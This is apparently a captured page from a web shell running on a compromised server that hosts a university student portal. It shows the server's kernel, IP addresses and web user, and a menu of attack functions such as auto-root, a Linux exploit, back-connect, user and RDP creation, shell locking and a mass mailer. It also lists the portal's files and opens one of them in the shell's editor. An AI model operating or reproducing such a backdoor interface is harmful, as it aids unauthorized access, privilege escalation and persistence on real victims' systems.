Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.17.165.235
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
demo /
studentportal_22 /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
sms
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
MainPage.html
7.78
KB
-rwxr-xr-x
MainPage2.html
15.28
KB
-rwxr-xr-x
Thumbs.db
2.5
KB
-rwxr-xr-x
cManualMailer.php
3.69
KB
-rwxr-xr-x
database.php
374
B
-rwxr-xr-x
emaillogTest.php
1.43
KB
-rwxr-xr-x
forgot-password.html
5.51
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
4.85
KB
-rwxr-xr-x
getLocation.php
429
B
-rwxr-xr-x
getstatesanduniv.php
419
B
-rwxr-xr-x
helpdesk.html
2.2
KB
-rwxr-xr-x
index.html
5.06
KB
-rwxr-xr-x
index2.html
9.49
KB
-rwxr-xr-x
info.php
96
B
-rwxr-xr-x
instruction.html
4.39
KB
-rwxr-xr-x
lastdate.html
3.13
KB
-rwxr-xr-x
pgResponse.php
4.3
KB
-rwxr-xr-x
registration.html
7.25
KB
-rwxr-xr-x
registration.php
543
B
-rwxr-xr-x
resetpassword.php
696
B
-rwxr-xr-x
sendGridMail.php
1.2
KB
-rwxr-xr-x
sendMobEmailOTP.php
3.44
KB
-rwxr-xr-x
sign-up.html
8.37
KB
-rwxr-xr-x
signin.php
1.44
KB
-rwxr-xr-x
signup.php
830
B
-rwxr-xr-x
sms.html
54.9
KB
-rwxr-xr-x
sms_09082018.html
55.58
KB
-rwxr-xr-x
smsindex.html
4.37
KB
-rwxr-xr-x
smsmobilenos.php
255
B
-rwxr-xr-x
validateInfo.php
1.69
KB
-rwxr-xr-x
validateRegno.php
562
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : helpdesk.html
<!DOCTYPE html> <html> <head> <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Expires" content="0" /> <meta charset="UTF-8"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>Help Desk | Student Portal</title> <!-- Favicon--> <link rel="icon" href="favicon.ico" type="image/x-icon"> <!-- Google Fonts --> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet"> <!-- Waves Effect Css --> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet"> </head> <body class="login-page" style="background: url(images/Background.jpg);min-width:800px;"> <div class="login-box" style = ""> <div class="logo"> <a href="javascript:void(0);">Student<b> Portal</b></a> <!-- <small>Admin BootStrap Based - Material Design</small> --> </div> <div class="card" style = "height: 50vh !important;" > <div class="body" id="sign_in" > <h4><u>Help Desk for Kuvempu University</u></h4> <table style="font-weight: 500;font-size: 16px;margin-top: 20px;"> <tr> <td style = "width:20%;"> Phone : <span style="color: blue;"><u>8183098136, 8183098138</u></span><br> Email : <span style="color: blue;"><u>logisys.helpdesk@gmail.com</u></span></p> </td> </tr> </table> <br> <h4><u>Help Desk for Akkamahadevi Women's University, Vijayapura</u></h4> <table style="font-weight: 500;font-size: 16px;margin-top: 20px;"> <tr> Phone : <span style="color: blue;"><u>9742428898, 08352-229023</u></span><br> Email : <span style="color: blue;"><u>kswu.logisys@gmail.com</u></span></p> </tr> </table> </div> </div> </div> </div> <script src="js/compressed.js"></script> </body> </html>
Close